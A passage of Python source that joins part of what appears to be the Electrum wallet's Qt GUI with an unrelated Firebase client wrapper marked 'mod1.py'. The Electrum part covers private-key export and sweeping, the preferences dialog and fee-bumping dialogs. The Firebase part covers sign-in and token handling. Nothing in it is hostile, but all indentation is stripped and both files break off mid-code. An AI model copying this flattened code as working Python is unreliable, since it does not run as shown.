select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
#traceback.print_exc(file=sys.stderr)
self.show_message(str(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 BTC = 1000 mBTC. 1 mBTC = 1000 bits. 1 bit = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee' + ':')))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_transactions(write=True)
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(":icons/offline_tx.png"), None, _('Success'), msg)
return True
|
mod1.py
|
import requests
from requests import Session
from requests.exceptions import HTTPError
try:
from urllib.parse import urlencode, quote
except:
from urllib import urlencode, quote
import json
import math
from random import uniform
import time
from collections import OrderedDict
from sseclient import SSEClient
import threading
import socket
from oauth2client.service_account import ServiceAccountCredentials
from gcloud import storage
from requests.packages.urllib3.contrib.appengine import is_appengine_sandbox
from requests_toolbelt.adapters import appengine
import python_jwt as jwt
from Crypto.PublicKey import RSA
import datetime
def lets_do_it(config):
return Firebase_with_python(config)
class Firebase_with_python:
""" Firebase Interface """
def __init__(self, config):
self.api_key = config["apiKey"]
self.auth_domain = config["authDomain"]
self.database_url = config["databaseURL"]
self.storage_bucket = config["storageBucket"]
self.credentials = None
self.requests = requests.Session()
if config.get("serviceAccount"):
scopes = [
'https://www.googleapis.com/auth/firebase.database',
'https://www.googleapis.com/auth/userinfo.email',
"https://www.googleapis.com/auth/cloud-platform"
]
service_account_type = type(config["serviceAccount"])
if service_account_type is str:
self.credentials = ServiceAccountCredentials.from_json_keyfile_name(config["serviceAccount"], scopes)
if service_account_type is dict:
self.credentials = ServiceAccountCredentials.from_json_keyfile_dict(config["serviceAccount"], scopes)
if is_appengine_sandbox():
# Fix error in standard GAE environment
# is releated to https://github.com/kennethreitz/requests/issues/3187
# ProtocolError('Connection aborted.', error(13, 'Permission denied'))
adapter = appengine.AppEngineAdapter(max_retries=3)
else:
adapter = requests.adapters.HTTPAdapter(max_retries=3)
for scheme in ('http://', 'https://'):
self.requests.mount(scheme, adapter)
def auth(self):
return Auth(self.api_key, self.requests, self.credentials)
def database(self):
return Database(self.credentials, self.api_key, self.database_url, self.requests)
def storage(self):
return Storage(self.credentials, self.storage_bucket, self.requests)
class Auth:
""" Authentication Service """
def __init__(self, api_key, requests, credentials):
self.api_key = api_key
self.current_user = None
self.requests = requests
self.credentials = credentials
def sign_in_with_email_and_password(self, email, password):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyPassword?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"email": email, "password": password, "returnSecureToken": True})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
self.current_user = request_object.json()
return request_object.json()
def create_custom_token(self, uid, additional_claims=None):
service_account_email = self.credentials.service_account_email
private_key = RSA.importKey(self.credentials._private_key_pkcs8_pem)
payload = {
"iss": service_account_email,
"sub": service_account_email,
"aud": "https://identitytoolkit.googleapis.com/google.identity.identitytoolkit.v1.IdentityToolkit",
"uid": uid
}
if additional_claims:
payload["claims"] = additional_claims
exp = datetime.timedelta(minutes=60)
return jwt.generate_jwt(payload, private_key, "RS256", exp)
def sign_in_with_custom_token(self, token):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyCustomToken?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"returnSecureToken": True, "token": token})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def refresh(self, refresh_token):
request_ref = "https://securetoken.googleapis.com/v1/token?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"grantType": "refresh_token", "refreshToken": refresh_token})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
request_object_json = request_object.json()
# handle weirdly formatted response
user = {
"userId": request_object_json["user_id"],
"idToken": request_object_json["id_token"],
"refreshToken": request_object_json["refresh_token"]
}
return user
def get_account_info(self, id_token):
